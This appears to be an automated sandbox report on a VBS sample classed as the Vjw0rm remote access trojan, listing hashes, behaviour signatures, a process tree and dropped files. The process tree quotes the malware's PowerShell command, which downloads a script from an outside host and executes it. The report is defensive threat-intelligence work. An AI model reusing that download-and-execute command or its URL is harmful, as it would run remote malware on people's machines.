Analysis

  • max time kernel: 147s
  • max time network: 156s
  • platform: windows10_x64
  • resource: win10v20210408
  • submitted: 24-08-2021 22:28

General

  • Target: NS882992019101.vbs
  • Size: 13KB
  • MD5: 1abbd5432118e4de7c696d5d43a7449f
  • SHA1: 49fea89d7fc9f8be3afa2fd1b0ae9b6075c0acbf
  • SHA256: b4489a7f0467bee2782b5e5cf74763d0c05148a9044092eb79aba7c588f35f99
  • SHA512: 7012990308d3b7e451c65b1bc1e26693a04e1bd63f3c3d735538fbb4e9092d87b3ed323a45231004fcbd3795c11803477d8c1645cf1d2b9c0fc915150161b31f

Score: 10/10

Malware Config

Extracted

  • Language: ps1
  • Source: exe.dropper
  • URLs: http://7501.nerdpol.ovh/7501/fr.txt

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Blocklisted process makes network request (2 IoCs)
  • Drops startup file (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses (6 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NS882992019101.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient]$WEB=New-Object System.Net.WebClient;$WEB.DownloadFile('http://7501.nerdpol.ovh/7501/fr.txt','C:\Users\Public\fr.PS1');PowerShell -File C:\Users\Public\fr.PS1
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Users\Public\fr.PS1
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2396

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery: System Information Discovery, T1082 (1)

Downloads

  • C:\Users\Public\fr.PS1
    MD5: 5480fceef4e5290938cb0a23955358df
    SHA1: 891c237730a39b36bd443e485d3493f5f7ff68c5
    SHA256: d9cfdea62d4a3acc5ec47cfc0349002af129add61611a0810b73394bc7ea3020
    SHA512: 3cf3bef1f0d02ba68d5656e842a58b001aa4ba7b67ab1e21d93b8f2efa604283c58224bd8f8a208b09ab14e1443f78e4da7dbbbd1f1edfaa60316ae1056be392

  • memory/2396-129-0x0000000000000000-mapping.dmp
  • memory/2396-140-0x0000023E344D3000-0x0000023E344D5000-memory.dmp (Filesize: 8KB)
  • memory/2396-139-0x0000023E344D0000-0x0000023E344D2000-memory.dmp (Filesize: 8KB)
  • memory/2396-178-0x0000023E344D6000-0x0000023E344D8000-memory.dmp (Filesize: 8KB)
  • memory/3556-114-0x0000000000000000-mapping.dmp
  • memory/3556-119-0x000002AE72930000-0x000002AE72931000-memory.dmp (Filesize: 4KB)
  • memory/3556-122-0x000002AE72AE0000-0x000002AE72AE1000-memory.dmp (Filesize: 4KB)
  • memory/3556-123-0x000002AE727F0000-0x000002AE727F2000-memory.dmp (Filesize: 8KB)
  • memory/3556-126-0x000002AE727F3000-0x000002AE727F5000-memory.dmp (Filesize: 8KB)
  • memory/3556-138-0x000002AE727F6000-0x000002AE727F8000-memory.dmp (Filesize: 8KB)